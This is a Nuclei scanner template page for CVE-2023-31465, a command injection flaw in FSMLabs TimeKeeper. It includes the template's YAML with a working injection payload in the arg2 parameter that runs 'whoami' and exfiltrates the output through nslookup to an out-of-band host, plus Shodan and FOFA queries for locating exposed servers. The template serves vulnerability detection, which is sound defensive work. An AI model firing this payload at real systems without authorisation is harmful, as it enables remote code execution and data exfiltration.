Skip to content
Nuclei Templates

TimeKeeper by FSMLabs - Remote Code Execution

ID: CVE-2023-31465

Severity: critical

Author: ritikchaddha

Tags: cve,cve2023,timekeeper,rce,oast,fsmlabs

Description

Section titled “Description”

An issue was discovered in FSMLabs TimeKeeper 8.0.17 through 8.0.28. By intercepting requests from various timekeeper streams, it is possible to find the getsamplebacklog call. Some query parameters are passed directly in the URL and named arg[x], with x an integer starting from 1; it is possible to modify arg[2] to insert Bash code that will be executed directly by the server.

YAML Source

Section titled “YAML Source”
id: CVE-2023-31465


info:
  name: TimeKeeper by FSMLabs - Remote Code Execution
  author: ritikchaddha
  severity: critical
  description: |
    An issue was discovered in FSMLabs TimeKeeper 8.0.17 through 8.0.28. By intercepting requests from various timekeeper streams, it is possible to find the getsamplebacklog call. Some query parameters are passed directly in the URL and named arg[x], with x an integer starting from 1; it is possible to modify arg[2] to insert Bash code that will be executed directly by the server.
  reference:
    - https://github.com/CapgeminiCisRedTeam/Disclosure/blob/main/CVE%20PoC/CVE-ID%20%7C%20RealGimm%20%20-%20Reflected%20Cross-site%20Scripting.md
    - https://nvd.nist.gov/vuln/detail/CVE-2023-31465
    - https://fsmlabs.com/fsmlabs-cybersecurity/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-31465
    epss-score: 0.0156
    epss-percentile: 0.87192
    cpe: cpe:2.3:a:fsmlabs:timekeeper:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: fsmlabs
    product: timekeeper
    shodan-query: http.favicon.hash:2134367771
    fofa-query: icon_hash=2134367771
  tags: cve,cve2023,timekeeper,rce,oast,fsmlabs


http:
  - raw:
      - |
        GET /getsamplebacklog?arg1=2d0ows2x9anpzaorxi9h4csmai08jjor&arg2=%7b%22type%22%3a%22client%22%2c%22earliest%22%3a%221676976316.328%7c%7cnslookup%20%24(xxd%20-pu%20%3c%3c%3c%20%24(whoami)).{{interactsh-url}}%7c%7cx%22%2c%22latest%22%3a1676976916.328%2c%22origins%22%3a%5b%7b%22ip%22%3a%22{{Hostname}}%22%2c%22source%22%3a0%7d%5d%2c%22seriesID%22%3a3%7d&arg3=undefined&arg4=undefined&arg5=undefined&arg6=undefined&arg7=undefined HTTP/1.1
        Host: {{Hostname}}


    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - dns


      - type: word
        part: body
        words:
          - '{"seriesID":'
# digest: 4a0a00473045022069f9d0e80bb6da841b4120e78f723ad858f778a0add069a4be95f542b44b5a78022100888e8972d6df118d7781dd4c02842bd13f48cf930d9552620ea065646597f43c:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2023/CVE-2023-31465.yaml"

View on Github